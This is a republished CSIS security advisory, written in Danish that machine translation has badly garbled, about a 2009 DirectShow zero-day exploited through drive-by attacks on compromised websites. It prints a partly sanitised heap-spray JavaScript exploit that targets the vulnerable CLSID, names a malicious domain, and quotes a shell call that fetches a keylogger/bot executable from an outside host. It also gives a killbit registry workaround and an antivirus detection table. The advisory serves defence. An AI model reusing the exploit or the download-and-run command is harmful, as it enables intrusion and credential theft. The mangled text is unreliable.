Microsoft has another 0-day attack!

Source: Internet
Author: User

From: CSIS

 

CSIS Har opfanget flere systematiske Drive-By angreb der udnytter en ikke patchet s restart rbarhed I Microsoft DirectShow (msvidctl. DLL ). I tusindvis af websider er I weekenden blevet kompromitteret og skadelimpaired script er blevet indsat.

Angreb UDF ø res via kompromitterede websider og et indlejret JavaScript der flytter en BES ø ger FRA websiden over mod flere fjendtlige Drive-By servere. CSIS Har blacklistet flere Dom handler ner I CSIS sec-DNS for at beskytte mod dette og tilsvarende angreb.

Det skadelige script, Som inds release ttes P release kompromitterede websider, tvinger brugeren til at BES ø Ge Dom release net: (mellemrum indlagt af CSIS)
8oy4t. 8 866.org. FRA denne webside hentes "/AA/go.jpg" Der udnytter multiple s extends rbarheder, herunder et hidtil ukendt Stack Overflow I DirectShow MPEG2TuneRequest.

S release rbarheden befinder sig I flere versioner af Microsoft Windows BL. A. Windows 2000,200 3 og XP.

Man Kan OMG implements problemet ved at S æ TTE en killbit ved den fejlbeh implements ftede CLSID:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ ActiveX Compatibility \ {0955ac62-bf2e-4cba-a2b9-a63f772d46cf}]
"Compatibility Flags" = DWORD: 00000400

Ovenst implements Ende l ø sning Dr sort ber den P sort g sort ldende clsid. man Kan inds mongotte OMR mongodet markeret med kursiv I notepad og gemme filen som. reg. kø r den FRA skrivebordet og glad den modificere registreringsdatabasen. bem javasrk at dette er et workaround og ikke en permant l ø sning P implements problemet.

Websiden fors ø GER at K ø re fø lgende shellkode (et udtr processing K herunder, saniteret af CSIS)

VaR appllaa = '0 ';
VaR nndx = '%' + 'u9' + '0' + '9' + '0' + '% U' + '9' + '0' + '9' + appllaa;
VaR Dashell = Unescape (nndx + "% u03eb % ueb59 % ue805
% Ufff8 % Uffff % u4937 % u4949 % u4949 % u4949 % u4949 "+
"+ [Snip]

VaR headersize = 20;
VaR omybro = Unescape (nndx );
VaR slackspace = headersize + Dashell. length;
While (omybro. Length & lt; slackspace)
Omybro + = omybro;
Bzmybr = omybro. substring (0, slackspace );
Shuishimvp = omybro. substring (0, omybro. Length-slackspace );
While (shuishimvp. Length + slackspace & lt; 0x30000)
Shuishimvp = sh uishimvp + bzmybr; Memory = new array ();
For (x = 0; X & lt; 300; X ++)
Memory [x] = shuishimvp + Dashell;
VaR myobject = Document. createelement ('object ');
Divid. appendchild (myobject );
Myobject. width = '1 ';
Myobject. Height = '1 ';
Myobject. Data = './logo.gif ';
Myobject. classid = 'clsid: 0955ac62-bf2e-4cba-a2b9-a63f772d46cf ';

Koden spawner en shell med F ø lgende kald, hvorfra der hentes og K ø res skadelig kode: (mellemrum indlagt af CSIS)
C: \ [% Program Files %] \ Internet Explorer \ iw.e.exe "http: // mill/lk.com/wm/svchost.exe

M merge let Med dette angreb er at K ø re filen "svchost.exe" P å s restart rbare systemer. filen er en keylogger, der registrerer samtlige tastetryk P limit maskinen og derudover binder maskinen ind I et C & C/BOT netv limit rk. koden henter flere ledsager komponenter der installerer en cocktail af skadelig kode P includet kompromitterede system.

Bem effecrk at Vi har set flere injektion angreb der udnytter denne s limit rbarhed. Der anvendes flere forskellige landingszoner, s limit VI anbefaler at man beskytter sig med CSIS sec-DNS.

Exploitkoden, der K ø res FRA Drive-By siden, OPN reject R f ø lgende antivirus detektion:

Antivirus version last update result
A-squared 4.5.0.18 2009.07.05-
AhnLab-V3 5.0.0.2 2009.07.05-
AntiVir 7.9.0.204 2009.07.03 html/shellcode. gen
Antiy-AVL 2.0.3.1 2009.07.03-
Authentium 5.1.2.4 2009.07.04-
Avast 4.8.1335.0 2009.07.04-
AVG 8.5.0.386 2009.07.05-
BitDefender 7.2 2009.07.05-
Cat-quickheal 10.00 2009.07.03-
ClamAV 0.94.1 2009.07.03-
Comodo 1538 2009.07.02-
Drweb 5.0.0.12182 2009.07.05-
Esafe 7.0.20.2009.07.02-
ETrust-vet 31.6.6596 2009.07.03-
F-Prot 4.4.56 2009.07.04-
F-Secure 8.0.14470.0 2009.07.05-
Fortinet 3.117.0.0 2009.07.03-
Gdata 19 2009.07.05-
Ikarus t3.1.1.64.0 2009.07.05-
Jiangmin 11.0.706 2009.07.05-
K7antivirus 7.10.783 2009.07.03-
Kaspersky 7.0.0.125 2009.07.05-
McAfee 5666 2009.07.04-
McAfee + Artemis 5666 2009.07.04-
McAfee-GW-edition 6.8.5 2009.07.05 heuristic. behaveslike. js. Bufferoverflow.
Microsoft 1.4803 2009.07.05 exploit: JS/shellcode. gen
NOD32 4217 2009.07.04-
Norman 6.01.09 2009.07.04-
Nprotect 2009.1.8.0 2009.07.05-
Panda 10.0.0.14 2009.07.04-
Pctools 4.4.2.0 2009.07.03-
Prevx 3.0 2009.07.05-
Rising 21.36.62.00 2009.07.05-
Sophos 4.43.0 2009.07.05-
Sunbelt 3.2.1858.2 2009.07.05-
Symantec 1.4.4.12 2009.07.05-
Thehacker 6.3.4.3.20.2009.07.04-
TrendMicro 8.950.0.1094 2009.07.04-
Vba32 3.12.10.7 2009.07.05-
ViRobot 2009.7.3.1818 2009.07.03-
Virusbuster 4.6.5.0 2009.07.04 Js. bofexploit. gen

 

-- EOF --

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.